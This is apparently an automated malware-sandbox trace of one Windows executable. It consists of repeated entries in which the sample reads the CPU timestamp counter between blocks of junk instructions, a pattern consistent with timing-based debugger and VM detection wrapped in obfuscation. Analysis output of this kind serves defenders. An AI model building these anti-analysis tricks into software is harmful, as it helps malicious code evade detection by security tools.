Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5EC6EB second address: 5EC70A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F12E108FDBCh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5EC70A second address: 5EC70F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5ECAC7 second address: 5ECAD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5950EA second address: 595141 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F12E0FAFC7Dh 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F12E0FAFC78h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov cx, 5E51h 0x00000031 push eax 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jp 00007F12E0FAFC76h 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5ECE44 second address: 5ECE64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E108FDBBh 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F12E108FDBDh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5ECE64 second address: 5ECE68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F30CD second address: 5F30E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F12E108FDBFh 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F3233 second address: 5F3244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jc 00007F12E0FAFC7Ch 0x0000000b jng 00007F12E0FAFC76h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F3244 second address: 5F3295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F12E108FDBEh 0x00000008 jmp 00007F12E108FDC1h 0x0000000d jmp 00007F12E108FDC3h 0x00000012 popad 0x00000013 push edi 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop edi 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F12E108FDBAh 0x00000021 jng 00007F12E108FDB6h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F3295 second address: 5F329A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F3680 second address: 5F3687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F3687 second address: 5F368C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F395F second address: 5F3965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F3965 second address: 5F396B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F396B second address: 5F3971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F3971 second address: 5F3976 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F4129 second address: 5F412D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F49CA second address: 5F49D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC7Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F49D9 second address: 5F4A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F12E108FDC6h 0x0000000b jmp 00007F12E108FDBFh 0x00000010 jne 00007F12E108FDC0h 0x00000016 jmp 00007F12E108FDBAh 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f jmp 00007F12E108FDC7h 0x00000024 pushad 0x00000025 popad 0x00000026 pop eax 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F4A32 second address: 5F4A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F4A38 second address: 5F4A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E108FDC4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F4A50 second address: 5F4A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F4CD4 second address: 5F4CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F12E108FDBEh 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F4CEB second address: 5F4CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5F4CF5 second address: 5F4D14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jg 00007F12E108FDFAh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FA7B7 second address: 5FA7BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FA7BD second address: 5FA7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FA7C3 second address: 5FA7C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF3FD second address: 5FF401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF401 second address: 5FF405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF405 second address: 5FF40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF40B second address: 5FF42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F12E0FAFC88h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF718 second address: 5FF738 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC2h 0x00000007 je 00007F12E108FDB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF738 second address: 5FF73E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF73E second address: 5FF75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F12E108FDC6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF75F second address: 5FF76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FF8D9 second address: 5FF8E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FFA45 second address: 5FFA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F12E0FAFC7Ah 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FFA53 second address: 5FFA67 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F12E108FDBEh 0x00000008 jns 00007F12E108FDB6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FFA67 second address: 5FFA6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FFA6B second address: 5FFAB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F12E108FDC3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F12E108FDBBh 0x00000017 jmp 00007F12E108FDBBh 0x0000001c push edi 0x0000001d pop edi 0x0000001e popad 0x0000001f jmp 00007F12E108FDC0h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FFAB4 second address: 5FFAB9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5FFAB9 second address: 5FFAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 jo 00007F12E108FDBCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 606D98 second address: 606DDE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 jmp 00007F12E0FAFC86h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F12E0FAFC84h 0x00000014 ja 00007F12E0FAFC82h 0x0000001a push esi 0x0000001b pop esi 0x0000001c jmp 00007F12E0FAFC7Ah 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 607532 second address: 607537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 607537 second address: 60753D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 60753D second address: 607541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 607541 second address: 607576 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jc 00007F12E0FAFC76h 0x00000012 pop ebx 0x00000013 jmp 00007F12E0FAFC7Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F12E0FAFC84h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 608420 second address: 608424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 608424 second address: 608450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E0FAFC89h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F12E0FAFC76h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 608450 second address: 608454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 608454 second address: 60846F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F12E0FAFC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F12E0FAFC81h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 60846F second address: 60847D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E108FDBAh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 60847D second address: 60849D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F12E0FAFC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F12E0FAFC82h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 608C16 second address: 608C20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 608C20 second address: 608C42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F12E0FAFC7Eh 0x00000010 push edx 0x00000011 pop edx 0x00000012 jp 00007F12E0FAFC76h 0x00000018 jmp 00007F12E0FAFC7Ah 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6069AA second address: 6069B6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F12E108FDB6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 60F24B second address: 60F25F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F12E0FAFC7Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 60F25F second address: 60F265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 61AC89 second address: 61AC90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 61ADEF second address: 61ADF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 61ADF3 second address: 61ADF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 61ADF7 second address: 61AE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F12E108FDB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F12E108FDBCh 0x00000012 jno 00007F12E108FDB6h 0x00000018 jnc 00007F12E108FDB6h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 61AE1D second address: 61AE29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F12E0FAFC76h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 61AE29 second address: 61AE2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 620B86 second address: 620BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E0FAFC85h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6259B0 second address: 6259B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6259B6 second address: 6259DD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F12E0FAFC76h 0x00000008 jmp 00007F12E0FAFC81h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F12E0FAFC78h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 62D843 second address: 62D849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 62D849 second address: 62D862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F12E0FAFC84h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 54D3FA second address: 54D400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 54D400 second address: 54D404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 62FBDC second address: 62FBE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 62FBE4 second address: 62FC29 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F12E0FAFC8Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F12E0FAFC97h 0x00000010 jmp 00007F12E0FAFC85h 0x00000015 jo 00007F12E0FAFC7Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 632025 second address: 632058 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBCh 0x00000007 jmp 00007F12E108FDC2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jno 00007F12E108FDB6h 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 632058 second address: 63205C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 63205C second address: 632078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 631EC4 second address: 631ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jc 00007F12E0FAFC7Ch 0x0000000b js 00007F12E0FAFC76h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 631ED5 second address: 631EE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F12E108FDB6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 63818A second address: 63818E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 63818E second address: 638192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 638192 second address: 6381C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E0FAFC80h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F12E0FAFC80h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6381C3 second address: 6381E2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F12E108FDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F12E108FDBFh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 638592 second address: 6385AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E0FAFC85h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6385AD second address: 6385B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6385B1 second address: 6385CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC7Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
